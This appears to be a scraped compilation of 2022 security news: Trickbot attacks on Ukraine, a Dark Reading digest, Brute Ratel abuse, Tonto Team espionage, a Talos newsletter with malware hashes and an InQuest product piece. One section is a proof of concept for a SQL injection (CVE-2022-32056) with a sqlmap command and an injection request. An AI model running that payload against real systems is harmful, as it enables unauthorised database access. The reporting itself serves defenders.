Latest campaigns are a break from its usual financially motivated attacks and appear aligned with Russian interests, security researchers say.

In a break from precedent, Russia's hitherto purely financially motivated Trickbot threat group has systematically been attacking targets in Ukraine over the past three months, apparently in support of Russian government interests in the region.

Researchers from IBM's X-Force threat intelligence group this week said they had uncovered two campaigns — and analyzed four others that Ukraine’s Computer Emergency Response Team (CERT-UA) disclosed — where Trickbot went after targets in Ukraine. The campaigns began after Russia’s invasion of Ukraine in February and have targeted Ukrainian state authorities, government organizations, specific individuals, and the general population. Several of the attacks have involved phishing emails with various themes designed to grab the attention of Ukrainian users — included some that are war-related.

The attacks highlight an unprecedented shift for Trickbot, and it's notable because threat groups in former Soviet Union states have typically avoided attacking targets in each other’s countries, IBM said.

Prior to the Russian invasion, ITG23, which is the name by which IBM tracks Trickbot, had not been known to target Ukraine. "Much of the group's malware was even configured to not execute on systems if the Ukrainian language was detected," IBM said in a report summarizing its findings this week. "ITG23's campaigns against Ukraine are notable due to the extent to which this activity differs from historical precedent and the fact that these campaigns appeared specifically aimed at Ukraine with some payloads that suggest a higher degree of target selection."

**Multiple Malware Tools**

IBM said it has observed Trickbot distributing several known malware tools such as IcedID, Cobalt Strike, AnchorMail, and Meterpreter in its attacks on Ukrainian targets. Some of the attacks involved the use of new tools such as a malicious Excel downloader, a self-extracting archive for dropping various malware payloads and a new malware encryption and obfuscation tool.

One of the two Trickbot campaigns that IBM uncovered was in early May. In those attacks, IBM observed the threat actor using a weaponized Excel file to download its AnchorMail backdoor on compromised systems. AnchorMail is a revamped version of Trickbot’s AnchorDNS, a backdoor that members of the closely affiliated Conti group have been using to deploy Conti ransomware. IBM X-Force researchers have previously described the malware as notable for communicating with its command-and-control (C2) server using the DNS protocol.

The second recent Trickbot campaign that IBM X-Force researchers spotted occurred likely in late May or early June. In that campaign, Trickbot actors used an ISO image file — or archive file containing the contents of an optical disk — as part of an attack chain to drop the Cobalt Strike post-exploit attack kit on target system. In June, Trickbot users were observed exploiting the so-called “Follina” zero-day bug in the Windows Microsoft Support Diagnostic Tool (MSDT) to deploy Cobalt Strike.

The campaigns that CERT-UA disclosed, and which IBM X-Force researchers analyzed, involved Trickbot attempts to deploy IcedID, a banking Trojan turned malware distributor; Metasploit attack payload, Meterpreter; and Cobalt Strike. In five of the six observed campaigns, Trickbot actors directly downloaded Cobalt Strike, AnchorMail, or Meterpreter on target systems — another break from their usual habit of deploying these tools as secondary payloads. IBM said the switch suggests "these attacks are part of targeted campaigns during which ITG23 is willing to immediately deploy higher-value backdoors."

IBM described the new malicious Excel downloader that Trickbot is using in the Ukrainian attacks as designed to download malware from a hard-coded URL. The downloader is stored as a macro within the Excel file and runs automatically if the file is opened — provided the user has macros enabled. The new dropper for AnchorMail that IBM observed is in the form of a WinRAR Self Extracting Archive. The dropper is rigged to extract and execute a script for building and configuring AnchorMail on infected systems.

Trickbot is a highly successful threat group that has been around since at least 2016. The group initially used its eponymously named malware to steal credentials to banking accounts. Over the years, the group evolved into a sort of initial access broker and a distributor for several ransomware and malware tools, most notably Conti and Ryuk and Emotet. Trickbot is used variously for stealing data, enabling cryptomining, enumerating systems, and other malicious activities.

Court documents in connection with the arrest of a key member of the group last year showed that nearly 20 cybercriminals — including several malware experts — collaborated in building the malware. A massive 2020 international law enforcement operation to take the threat actor down temporarily disrupted its activities but failed to stop them.

In Switch, Trickbot Group Now Attacking Ukrainian Targets

Dark Reading's digest of the other don't-miss stories of the week, including a new ransomware targeting QNAP gear, and a destructive attack against the College of the Desert that lingers on.

Cybercrime never sleeps — but editors do. To cap off this short Fourth of July week, Dark Reading's editors are collecting all of the interesting threat intelligence and cyber-incident stories that we just didn't get to earlier but would be remiss to not cover.  

We're talking a critical Cisco vulnerability, a Microsoft alert on upgrades to the Hive ransomware, QNAP issues, and a pair of cyberattacks.

In this week's "in case you missed it" (ICYMI) digest, read on for more about the following:

*   **Critical Cisco Security Vulnerability Allows Root Access to OS**
*   **Hive Ransomware Gets a Rust-y Upgrade**
*   **QNAP Warns on "Checkmate" Ransomware Attacks**
*   **"SHI-eesh": IT Giant Knocked Offline in Coordinated Cyberattack**
*   **California College Remains Offline After Ransomware Hit**

**Critical Cisco Security Vulnerability Allows Root Access to OS**

Cisco has rolled out patches for 10 security bugs, including a critical flaw that could allow cyberattackers to manipulate application source code, or configuration and critical system files.

The critical issue (CVE-2022-20812, CVSS severity score of 9.0) is a path-traversal vulnerability affecting the Cisco Expressway Series software and Cisco TelePresence VCS software, if they are in the default

"A vulnerability in the cluster database API of Cisco Expressway Series and Cisco TelePresence VCS could allow an authenticated, remote attacker with Administrator read-write privileges on the application to conduct absolute path traversal attacks on an affected device and overwrite files on the underlying operating system as a root user," according to the advisory, the latest since Cisco's last bug disclosure in May.

The vulnerability arises thanks to insufficient input validation of user-supplied command arguments, the networking giant noted.

"An attacker could exploit this vulnerability by authenticating to the system as an administrative read-write user and submitting crafted input to the affected command."

**Hive Ransomware Gets a Rust-y Upgrade**

The ransomware-as-a-service (RaaS) offering known as Hive has overhauled its infrastructure, using the programming language Rust.

That's the buzz from Microsoft, whose security researchers noted that Hive is an exemplar of adapting to the rapid change found in the underground economy.

"With its latest variant carrying several major upgrades, Hive also proves it’s one of the fastest-evolving ransomware families, exemplifying the continuously changing ransomware ecosystem," researchers said in a post this week. "The most notable changes include a full code migration to another programming language \[from GoLang to Rust\] and the use of a more complex encryption method."

Rust, a language also used by the BlackCat ransomware, allows advances in coding control, memory usage, resistance to reverse engineering, and access to a range cryptographic libraries, the researchers said.

As for the encryption, "the new Hive variant uses string encryption that can make it more evasive," according to the advisory. “The constants that are used to decrypt the same string sometimes differ across samples, making them an unreliable basis for detection.”

**QNAP Warns on "Checkmate" Ransomware Attacks**

QNAP, the network-attached storage (NAS) vendor, is flagging activity against its devices that results in the execution of the Checkmate ransomware.

The cyberattackers are specifically targeting SMB file-sharing services exposed to the Internet, using a dictionary attack to break accounts with weak passwords.

"Once the attacker successfully logs in to a device, they encrypt data in shared folders and leave a ransom note with the file name '!CHECKMATE\_DECRYPTION\_README' in each folder," according to QNAP's advisory this week. It added, "We are thoroughly investigating the case and will provide further information as soon as possible."

Customers of the Taiwan-based appliance maker have been suffering ongoing, relentless ransomware activity — which Dark Reading broke down earlier this week (along with potential defenses) in an extensive roundtable of experts.

To protect their businesses and avoid a ransomware checkmate, users should avoid exposing the SMB service to the internet and should employ strong passwords in any event.

**"SHI-eesh": IT Giant Knocked Offline in Coordinated Cyberattack**

IT-supplier bigwig SHI International said this week that it was the target of "a coordinated and professional malware attack."

The New Jersey-based vendor, which has 5,000 employees and 15,000 customers around the world, said that it moved quickly to stop the infection and minimize the impact on SHI’s systems and operations. That meant that some systems, such as SHI’s public websites and email, were knocked offline "while the attack was investigated and the integrity of those systems was assessed."

The SHI staff regained access to email, but as of Thursday the main website was still not operational. The company said in a website notice that IT teams continue to work to bring other systems back online.

It's unclear what the cyberattackers' goal was, but some researchers noted that a supply chain compromise attempt is a real possibility.

“Apart from being a large enterprise, SHI is a major software and hardware provider to several Fortune 500 companies, and while there is no evidence regarding third-party suppliers getting breached or customer data getting exfiltrated, this is certainly too close for comfort for many of their customers," Rajiv Pimplaskar, CEO at Dispersive Holdings, said via email.

**California College Remains Offline After Ransomware Hit**

As the latest example of what happens when IT isn't prepared for a hit, the 12,500-student College of the Desert, a community college in Palm Desert, Calif., remains offline after suffering which researchers suspect was a ransomware attack.

The cyberattack brought down the school's online services and campus phone lines on July 4. As of late Thursday, the school's website still returned a notice that it "is currently experiencing a system-wide outage of most services," including the ability for students to request transcripts, add or drop classes, or register for classes.

"Educational institutions have continued to be a prime target for ransomware groups over the last couple of years," says Josh Rickard, senior security solutions architect at Swimlane, noting that this is the second time College of the Desert has been hit with a malware attack; the first incident took place in August 2020. "To prevent similar attacks in the future and ensure that operations continue to run smoothly, education institutions such as College of the Desert need to devote more resources to information security teams, tools, processes, and products."

Rickard suspects the incident was ransomware due to the severe operational disruption, but it should be noted that College of the Desert has not confirmed that, admitting only to a "computer network disruption."

ICYMI: Critical Cisco RCE Bug, Microsoft Breaks Down Hive, SHI Cyberattack

In what's being described as an "unprecedented twist," the operators of the TrickBot malware have resorted to systematically targeting Ukraine since the onset of the war in late February 2022.
The group is believed to have orchestrated at least six phishing campaigns aimed at targets that align with Russian state interests, with the emails acting as lures for delivering malicious software such

In what's being described as an "unprecedented twist," the operators of the TrickBot malware have resorted to systematically targeting Ukraine since the onset of the war in late February 2022.

The group is believed to have orchestrated at least six phishing campaigns aimed at targets that align with Russian state interests, with the emails acting as lures for delivering malicious software such as IcedID, CobaltStrike, AnchorMail, and Meterpreter.

Tracked under the names ITG23, Gold Blackburn, and Wizard Spider, the financially motivated cybercrime gang is known for its development of the TrickBot banking trojan and was subsumed into the now-discontinued Conti ransomware cartel earlier this year.

But merely weeks later, the actors associated with the group resurfaced with a revamped version of the AnchorDNS backdoor called AnchorMail that uses SMTPS and IMAP protocols for command-and-control communications.

"ITG23's campaigns against Ukraine are notable due to the extent to which this activity differs from historical precedent and the fact that these campaigns appeared specifically aimed at Ukraine with some payloads that suggest a higher degree of target selection," IBM Security X-Force analyst Ole Villadsen said in a technical report.

A noticeable shift in the campaigns involves the use of never-before-seen Microsoft Excel downloaders and the deployment of CobaltStrike, Meterpreter, and AnchorMail as first-stage payloads. The attacks are said to have commenced in mid-April 2022.

Interestingly, the threat actor leveraged the specter of nuclear war in its email ruse to spread the AnchorMail implant, a tactic that would be repeated by the Russian nation-state group tracked as APT28 two months later to spread data-stealing malware in Ukraine.

What's more, the Cobalt Strike sample deployed as part of a May 2022 campaign utilized a new crypter dubbed Forest to evade detection, the latter of which has also been used in conjunction with the Bumblebee malware, lending credence to theories that the loader is being operated by the TrickBot gang.

"Ideological divisions and allegiances have increasingly become apparent within the Russian-speaking cybercriminal ecosystem this year," Villadsen noted. "These campaigns provide evidence that Ukraine is in the crosshairs of prominent Russian cybercriminal groups."

The development comes as Ukrainian media outlets have been targeted with phishing messages containing malware-laced documents that exploit the Follina vulnerability to drop the DarkCrystal RAT on compromised systems.

The Computer Emergency Response Team of Ukraine (CERT-UA) has also warned of intrusions conducted by a group called UAC-0056 that involves striking state organizations with staffing-themed lures to drop Cobalt Strike Beacons on the hosts.

The agency, last month, further pointed out the use of Royal Road RTF weaponizer by a China-based actor codenamed the Tonto Team (aka Karma Panda) to target scientific and technical enterprises and state bodies located in Russia with the Bisonal malware.

Attributing these attacks with medium confidence to the advanced persistent threat (APT) group, SentinelOne said the findings demonstrate "a continued effort" on the part of the Chinese intelligence apparatus to target a wide range of Russian-linked organizations.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

TrickBot Malware Shifted its Focus on "Systematically" Targeting Ukraine

The latest criminal use of a legitimate red-teaming tool helps attackers stay under the radar and better access living-off-the-land binaries.

In a fresh campaign that takes a page from the advanced persistent threat known as APT29, hackers are shifting away from the Cobalt Strike post-exploitation toolkit, instead embracing Brute Ratel C4 (BRc4).

BRc4 is the latest upstart in the red-team tooling world; like Cobalt Strike, it's an adversarial attack simulation tool designed for penetration testers. It’s a command-and-control (C2) framework that's not easily detected by endpoint detection and response (EDR) technology or other anti-malware tools.

A report from Palo Alto Networks' Unit 42 research team found evidence of attackers subverting Brute Ratel's free licensing protections and utilizing the tool to run criminal attack campaigns.

The infrastructure they uncovered is extensive, researchers noted.

"In terms of C2, we found that the sample called home to an Amazon Web Services (AWS) IP address located in the United States over port 443," they explained. "Further, the X.509 certificate on the listening port was configured to impersonate Microsoft with an organization name of 'Microsoft' and organization unit of 'Security.'"

Pivoting on the certificate and other artifacts, "we identified a total of 41 malicious IP addresses, nine BRc4 samples, and an additional three organizations across North and South America who have been impacted by this tool so far," they added.

**Living-Off-the-Land Techniques**

Unit 42 said the sample utilizing BRc4 uses known APT29 techniques, including well-known cloud storage and online collaboration applications. In this case, the sample studied was packaged up as a self-contained ISO that included a Windows shortcut LNK file, a malicious payload library, and a legitimate copy of Microsoft OneDrive Updater.

"Attempts to execute the benign application from the ISO-mounted folder resulted in the loading of the malicious payload as a dependency through a technique known as DLL search order hijacking," the report explained.

This technique of using legitimate tools and native utilities is known as "living off the land," and threat actors are increasingly using living-off-the-land binaries (LOLBins) to drop malicious payloads.

Last week for instance, researchers with Cyble reported an uptick in LNK file-based builders growing in popularity on Dark Web marketplaces, as various malware families lean on them for payload delivery.

"We have observed a steadily increasing number of high-profile threat actors shifting back to .LNK files to deliver their payloads," the Cyble researchers wrote. "Typically, threat actors use LOLBins in such infection mechanisms because it makes detecting malicious activity significantly harder."

**Where Red Team Tools Fit In**

Tools like Cobalt Strike and BRc4 aren't purely living-off-the-land approaches, "since you still have to introduce a piece of malware onto the system as opposed to using the operating systems built in tooling," explains Tim McGuffin, director of adversarial engineering at LARES Consulting.

However, these tools are nevertheless popular with attackers for their ability to evade detection mechanisms, fundamentally for the same reason as a living-off-the-land attack works — because they're otherwise viewed as legitimate software.

"Brute Ratel is an otherwise legitimate tool that might be present in victim networks," explains John Bambenek, principal threat hunter at Netenrich. "Since its use is likely whitelisted, it allows for attackers to operate more discretely than they would otherwise be able to do."

This is an unfortunate cycle that the security world has seen occur for a long time, as attackers are drawn to red-team tools like flies to honey.

According to Ivan Righi, senior cyber threat intelligence analyst for Digital Shadows, it's no surprise that BRc4 makes for an attractive tool. Not only does it have offensive security capabilities similar to Cobalt Strike that can be abused for malicious purpose, but it is also less known than Cobalt Strike.

"Many security solutions may not yet detect Brute Ratel as malicious, as opposed to Cobalt Strike, which is generally more well-known for being used for malicious purposes," Righi says.

According to McGuffin, security practitioners should be concerned about all toolkits like these, whether open source, commercial, or custom. But he believes that they shouldn't get caught up in the whack-a-mole game of detecting the framework or the tooling itself. Instead, they should focus on hardening their systems.

"An emphasis on endpoint hardening can be placed on prevention against any C2 tooling. An example is Microsoft's Attack Surface Reduction 'Application Allow-listing' guidance," he says. "The setting prevents unknown binaries from being introduced, and network egress hardening to prevent C2 callbacks to Command-and-Control servers."

Stealthy Cyber-Campaign Ditches Cobalt Strike for Rival 'Brute Ratel' Pen Test Tool

Online Accreditation Management v1.0 was discovered to contain a SQL injection vulnerability via the USERNAME parameter at process.php.

**Online-Accreditation-Management-System-v1.0-SQLi******Online Accreditation Management System v1.0 - SQLi******Vendor**

**Description:**

The vulnerability page is process.php

http://your-ip/AccreditationSystem/

Online Accreditation Management System v1.0

The USERNAME parameter in the process.php page appears to be vulnerable to SQL injection attacks.

\[+\]sqlmap:

Save the POST request package in 1.txt, and then run the sqlmap

python sqlmap.py -r 1.txt  --dbs

\[+\]POST request package

    POST /AccreditationSystem/process.php?action=loginagency HTTP/1.1
    Host: 10.211.55.3
    Content-Length: 40
    Accept: text/plain, */*; q=0.01
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.61 Safari/537.36
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Origin: http://10.211.55.3
    Referer: http://10.211.55.3/AccreditationSystem/
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: PHPSESSID=kc1vvdqjtt94b9i5461cf4s5r2
    Connection: close
    
    USERNAME=ff%E9%8E%88%27%22%5C%28&PASS=ff
    

**In action:**

**Proof and Exploit:**

watch the video here

CVE-2022-32056: GitHub - JackyG0/Online-Accreditation-Management-System-v1.0-SQLi

Orlando, FL, July 6, 2022 – Fortress Information Security, the nation’s leading cybersecurity provider for critical infrastructure organizations with digitized assets, today joined the Open Web Application Security Project (OWASP) as a silver sponsor. Fortress has allocated a portion of that sponsorship to support the CycloneDX project focused on promoting a lightweight Software Bill of Materials (SBOM) standard for application security and supply chain component analysis.

OWASP is a nonprofit foundation that works to improve software security by making application security risks visible. OWASP activities include community-led open source software projects, over 250+ local chapters worldwide, tens of thousands of members, and industry-leading educational and training conferences.

“OWASP and the CycloneDX project are critical to making universal SBOM principles and standards a reality,” said Betsy Jones, chief operating officer of Fortress Information Security. “Bringing software developers and cybersecurity professionals together openly and collaboratively will foster the development of trusted SBOM solutions.”

Joined by Tony Turner, Fortress vice president of research and development and an OWASP chapter and project leader for over 10 years, Fortress utilizes multiple OWASP projects such as CycloneDX, SCVS, OWASP Risk Ranking methodology, and many others to secure critical infrastructure.

OWASP is an open community dedicated to enabling organizations to conceive, develop, acquire, operate, and maintain applications that can be trusted. All projects, tools, documents, forums, and chapters are free and open to anyone interested in improving application security.

**About Fortress Information Security**  
Fortress Information Security secures critical industries from cybersecurity and operational threats stemming from vendors, assets, and software in their supply chains. Fortress is the only end-to-end platform that connects intelligence surrounding vendors, information technology and operational technology assets, and software through a holistic, fit-for-purpose approach. Fortress has also partnered with its customers and suppliers to form the Asset-to-Vendor (A2V) network, which facilitates the secure and seamless exchange of asset information and security intelligence, enabling collaborative workflows to better understand and remediate potential issues. Fortress serves critical industries such as energy, government, aerospace & defense, critical manufacturing, industrial automation, automotive, and healthcare.

**About OWASP**  
As the world’s largest non-profit organization concerned with software security, OWASP: supports the building of impactful projects; develops & nurtures communities through events and chapter meetings worldwide; and provides educational publications & resources to enable developers to write better software and security professionals to make the world’s software more secure.

Fortress Information Security Sponsors Open Web Application Security Project To Work on Industry-Wide Software Bill of Materials Standards

By Jon Munshaw. 
Welcome to this week’s edition of the Threat Source newsletter. 
I’ve been thinking a lot recently about the pros and cons of the way we publicize our threat research. I had a few conversations at Cisco Live with people — who are more generally IT-focused than...


[[ This is only the beginning! Please visit the blog for the complete entry ]]

_By Jon Munshaw._ 

Welcome to this week’s edition of the Threat Source newsletter. 

I’ve been thinking a lot recently about the pros and cons of the way we publicize our threat research. I had a few conversations at Cisco Live with people — who are more generally IT-focused than hyper-focused on cybersecurity — about the amount of information we share on our blog and social media profiles. Our blog serves as the main mouthpiece for Talos, but I’m also always talking to our audience, directly or indirectly, through social media channels, our podcasts, or out in the world at conferences. But during these conversations, readers may wonder if we’re indirectly “helping” the bad guys by pointing out what they’re doing wrong or what we are doing to track them. 

There will always be pros and cons to any type of disclosure of information at this level of cybersecurity. But it’s important to know that we don’t take this issue lightly. When we publicize a technique — whether it be in a blog post, conference talk or podcast — those attackers are actively using, it forces them to change tactics and take time to make tweaks and changes. Unfortunately, we alone do not have the power to bring an end to cybercrime. However, if we can increase the cost of doing business for a threat actor, it's a win for defenders and potential victims. As defenders, we must keep attackers out of their comfort zone and force them to innovate or perish. Without that information being out there publicly, these bad actors could keep using the same tactics indefinitely to infect other targets. 

This is by no means an easy decision to make, it’s a fine line all cybersecurity defenders must continually walk. But as we’ve pointed out several times, cybersecurity is a team sport. Prior to publishing any blog post, we take several steps to make sure everyone is on the same page, including victim notifications and information sharing with our partners like the Cyber Threat Alliance. I think we should all play on the same team and provide our teammates with as much information as possible so they’re ready for game time. To continue the analogy, information sharing with the public allows under-resourced teams to take action to defend themselves without needing to further strain their budgets and people.  

It does us no good to either keep this information to ourselves and try to go out on our own and single-handedly defeat these threat actors because that’s never going to work. And it also doesn’t make sense to be super competitive. We always seek to protect our customers first and foremost, and that includes responsible disclosure policies from our vulnerability management team to our threat researchers. Our intelligence pushes research and defenders forward, and we will always seek to arm them with as much information as possible.  

**The one big thing **

U.S. federal agencies unveiled a great deal about the MedusaLocker ransomware group last week with a joint advisory on the attackers’ operations. The U.S. Cybersecurity Infrastructure Security Agency, FBI and others shared several IOCs related to the actor, warning that they’ve spotted a recent uptick in MedusaLocker’s operations. MedusaLocker gains access to victim devices through vulnerable Remote Desktop Protocol (RDP) configurations or with malicious phishing and spam emails. Once on the targeted system, the attackers encrypt a victim’s files and await ransom payment while propagating across the network. 

> **Why do I care? **Cisco Talos first observed MedusaLocker operating in 2019. Clearly, the group has only expanded its operations since then and is now part of the massive ransomware-as-a-service industry that features several major threat actors. This group made its name by targeting health care organizations during the COVID-19 pandemic, but CISA’s advisory states any industry could be a target. The advisory includes new information on potential mitigations for this malware family, along with known IOCs to block associated with the group.   
> **So now what? **In addition to implementing the mitigations outlined in the advisory, Cisco Secure also has several options available to defend against this attack. There are multiple Snort rules that detect this ransomware’s activity along with several ClamAV signatures. As with all ransomware activity, it’s important to have physical backups on hand in the event of an attack so you can recover quickly. And you can always be prepared for the worst with a Cisco Talos Incident Response plan and/or playbook. 

**Other news of note**

The North Korean state-sponsored actor Lazarus Group is suspected to be behind a recent $100 million cryptocurrency theft. Members of the group allegedly exploited the Harmony Horizon Bridge software that allows users to trade virtual currency between the Harmony blockchain and other blockchains. Attackers obtained username and passwords of Harmony employees that they then used to break into the bridge and deploy several money laundering techniques to hide their actions. The tactics in this case are similar to another attack in April in which attackers stole $600 million from Ronin Bridge. (Bloomberg, Fortune) 

Bad actors are creating fake job applications and attending virtual interviews with deepfake videos. A new warning from the FBI states the adversaries are trying to obtain contractor-level jobs at technology companies, likely to steal sensitive information or make money illegitimately. These fake applicants use stolen identities, fake videos and doctored voices during the application process, including adding in what seem like normal human coughing, sneezing and blinking. The FBI recommends that recruiters or hiring managers look out for telltale signs of deepfake videos like sounds that do not line up with the video on the screen or unnatural lip movements. (TechCrunch, Gawker) 

Google is warning of a high-severity vulnerability in the Chrome web browser for Android that is actively being exploited in the wild. CVE-2022-2294 is a heap buffer overflow bug that, if exploited, could lead to denial-of-service attacks or arbitrary code execution. The company released a security update to patch the vulnerability this week. This update also includes fixes for another high-severity vulnerability (CVE-2022-2295) and an unspecified internal issue discovered. This is the fourth zero-day vulnerability to pop up in Chrome this year. (Dark Reading, Decipher) 

**Can’t get enough Talos? **

*   Talos Takes Ep. #102: Unmasking ransomware groups on the dark web
*   Researcher Spotlight: Around the security world and back again with Nick Biasini
*   Researchers Share Techniques to Uncover Anonymized Ransomware Sites on Dark Web

  

**Upcoming events where you can find Talos **

**A New HOPE** (July 22 - 24, 2022)  
New York City 

**BlackHat** **U.S.** (Aug. 6 - 11, 2022)  
Las Vegas, Nevada 

**DEF CON U.S.** (Aug. 11 - 14, 2022)  
Las Vegas, Nevada 

**Most prevalent malware files from Talos telemetry over the past week  **

**MD5:** 2915b3f8b703eb744fc54c81f4a9c67f   

**Typical Filename:** VID001.exe   

**Claimed Product:** N/A   

**Detection Name:** Win.Worm.Coinminer::1201 

**MD5:** 2c8ea737a232fd03ab80db672d50a17a    

**Typical Filename:** LwssPlayer.scr    

**Claimed Product:** 梦想之巅幻灯播放器    

**Detection Name:** Auto.125E12.241442.in02    

**MD5:** 10f1561457242973e0fed724eec92f8c    

**Typical Filename:** ntuser.vbe    

**Claimed Product:** N/A    

**Detection Name:** Auto.1A234656F8.211848.in07.Talos   

**MD5:** a7742a6d7d8b39f1a8cdf7f0b50f12bb    

**Typical Filename:** wrsanvs.exe  

**Claimed Product:** N/A      

**Detection Name:** W32.Auto:91e994229a.in03.Talos

Threat Source newsletter (July 7, 2022) — Teamwork makes the dream work

In a significant spike of activity, the state-sponsored group is going after intelligence on Russian government agencies.

Representing a significant increase in activity, a campaign linked to China started targeting Russia-linked organizations in June with malware designed to collect intelligence on government activities, according to analyses by security firms and Ukraine's Computer Emergency Response Team (CERT).   

The attacks use purported government advisories sent as Rich Text Files (RTFs) in an attempt to convince victims to open the documents, thus allowing a remote code execution (RCE) exploit in Microsoft Office to be run. That's according to endpoint security firm SentinelOne, which stated in an analysis published on Thursday that the contents of the documents appear as security warnings written in Russian. They claim to warn agencies and infrastructure providers of potential attacks and advise them of compliance requirements under Russian law.

**Escalating Cyberattacks Against Russia**

While China has targeted Russia in the past, and vice versa, the pace of attacks — especially by the purported threat actor, Tonto Team — has grown following the Russian invasion of Ukraine, says Tom Hegel, a senior threat researcher at SentinelOne.

"Tonto Team, like other Chinese actors, has a long history of targeting Russia," he says. "What we're seeing here is a potential Chinese government increase in intelligence collection requirements from inside Russia. Perhaps an increased prioritization or expansion of resources assigned to such tasking."

The reported increase in Chinese cyber operations comes as Russia has strengthened diplomatic relations with China in the face of sanctions from Western nations. While the two major nations are not formal allies, they have expanded trade and defense ties over the past decade as a way to foil the expansion of Western alliances.

    

Delivery timing of the malicious documents in latest Tonto Team attacks. Source: SentinelOne

In addition, they have different approaches to pursuing their foreign policy goals. Russia has tacitly allowed cybercriminal gangs to operate in its territory and has also widely used cyber operations to steal intelligence and attack infrastructure, as well as an adjunct to military operations. For example, Russia has used disinformation campaigns, infrastructure attacks, and espionage operations in its conflict with Ukraine.

China, which has profited significantly from economic relations with Western nations, has mainly pursued non-military approaches to international relations and used cyber operations for acquiring intellectual property and conducting espionage. Treating Russia as any other adversary just shows consistency, says SentinelOne's Hegel.

This is "simply China looking out for itself in uncertain times," he says. "Like any well-resourced nation, they seek to support their own agenda through cyber, and the state of affairs in Russia may be adjusting just what they prioritize."

**Technical Breadcrumbs Point to China**

The recent campaigns have used two pieces of malware linked to Chinese advanced persistent threats (APTs): a toolkit used to build malicious documents known as Royal Road and a custom remote access Trojan (RAT) known as Bisonal used by Chinese actors. The Tonto Team — also known as Karma Panda and Bronze Huntley — traditionally has focused on other Asian nations, such as South Korea and Japan, as well as the United States and Taiwan. Recently, the group has increased its operations to Russia, Pakistan, and other nations.

While false flag operations, where one adversary attempts to disguise their operations as another attacker, have happened, a variety of evidence links the attacks to China.

At least seven threat groups — all linked to China — use Royal Road to create malicious documents as part of the initial attack aimed at gaining access to targeted systems. In April, for example, cyberthreat intelligence firm DomainTools analyzed an document created with the Royal Road malware building toolkit that had the hallmarks of a Chinese espionage campaign and targeted a Russian underwater research and weapons development organization.

"Combined with the sensitive targeting and the attempts at hardening the ultimate payload, it appears the adversary went to some effort to evade analysis of their activity as well," the analysis stated. "Although this campaign appears specifically targeted to an entity in the Russian Federation, the underlying behaviors of this campaign — from malicious document usage through binary execution guardrails and controls — provide helpful insight into adversary tradecraft from which all defenders can learn valuable lessons."

In addition, Bisonal is used exclusively by Chinese groups, according to the advisories.

Companies should take note that nation-state attacks can often affect private businesses. The SentinelOne advisory has indicators of compromise (IoCs) for the latest campaigns, and DomainTools highlights various countermeasures for detecting and blunting cyber-espionage attacks.

Organizations should use the intelligence to check their own defenses against similar attacks, says SentinelOne's Hegel.

"Targets of espionage or disruption in today's world are not isolated to government networks but can overflow or directly hit private business simply because of their stance on a political issue or where they operate," he says. "As we observed when Ukraine was invaded, things can shift overnight — so CISOs should remain aware of this activity as we continue to live with such geopolitical tension."

China's Tonto Team APT Ramps Up Spy Operations Against Russia

When examining the modern threat landscape, empowering your security operations and overcoming the limitations inherent with other malware prevention solutions is imperative.

The implementation of defense-in-depth architectures and operating system hardening technologies have altered the threat landscape. Historically, zero-click, singular vulnerabilities were commonly discovered and exploited. The modern-day defensive posture requires attackers to successfully chain together multiple exploit techniques to gain control of a target system. The increased utilization of dynamic analysis systems has driven attackers to evade detection by requiring input or action from the user. Sometimes, the victim must perform several manual steps before the underlying payload is activated. Otherwise, it remains dormant and undetectable through behavioral analysis.

It is well known that client-side attacks are the predominant access vector for most initial access. Web browser and email-based malware campaigns target users through phishing, social engineering, and exploitation. Productivity and business tools from vendors like Adobe and Microsoft are widespread and provide attackers with many options. Combining the lack of security awareness training and well-developed social engineering tactics frequently results in users permitting the execution of malicious embedded logic like weaponized macros or other scripts. Analysis of these common malware carriers is time-consuming and tedious, and it requires expert skills. To adequately prevent, detect, and respond to these threats, an organization must throw everything at the problem and augment this previously human-intensive process.

Deep File Inspection (DFI) is one approach to ease the burden associated with continuous security monitoring. DFI is a static-analysis engine that inspects beyond Layer 7 of the OSI model, essentially automating the work of your typical SOC analyst or security researcher. Regardless of the complexity of evasive techniques a threat actor utilizes, DFI dissects malicious carriers to expose embedded logic, semantic context, and metadata. Coercive graphical lures are extracted and processed through a machine vision layer, adding to the semantic context of the original file. Commonly used obfuscation methods and encoding mechanisms are automatically discovered and deciphered.

A public concern that SOC analysts, IR teams, and security researchers encounter is the limited availability of context for detection analytics. In the case of intrusion prevention systems, resources are limited to microseconds of time and kilobytes of analyzable data. Intrusion detection systems can typically dig deeper, taking additional milliseconds to expose further data.

Regarding the time-analysis trade-off, the next step up is behavioral monitoring or sandboxed execution. This class of solutions detonates samples in a virtualized environment and annotates the system's behavior for threat detection; this process is both compute- and time-intensive, taking minutes to analyze each file. There is a middle ground where a few additional seconds can provide previously unseen detection opportunities.  

**Use Case: Qbot Malware Delivered via Follina and Malspam**

An example of an evasive threat is the recent TA570 campaigns that delivered Qbot malware with thread-hijacked emails. This wave of malspam utilized two different methods to provide the payload. The first method used a shortcut LNK to run a DLL with the hidden attribute. The second method is a Word document using the Follina (CVE-2022-30190) exploit.

    

Figure 2. Recent Qbot threat sequence. Source: InQuest

The attached HTML file contains an antiquated JS function to convert the embedded base64 string into a zip archive and prompt the victim to download. When extracted, the zip file contains a disk image that will be mounted showing either a shortcut or the shortcut and word document. The shortcut will execute the Qbot DLL within the directory with the hidden attribute set. At the same time, the Word file will attempt to exploit the MSDT vulnerability and download the payload from a remote server.

It is challenging for many solutions to carve the zip archive from the encoded HTML, extract the IMG file, and identify the weaponized contents. In this example, multiple threat signatures are seen from ambiguities within the SMTP headers, down to the hidden DLL or Follina document.

    

Figure 3. Variety of signatures alerts. Source: InQuest

Another interesting approach for detection is the concept of retrospective analysis or RetroHunting. While DFI creates a new dimension of data, RetroHunting provides a new dimension of time for analyzing historical events. The appearance of Follina and other zero-day vulnerabilities illustrates the usefulness of this capability by facilitating the detection of previously unseen alerts with emerging threat intelligence and detection logic.

In addition to a library of predeveloped signatures, analysts can develop user-defined YARA rules to combine strings, bytes patterns, and regular expressions via flexible conditional logic.

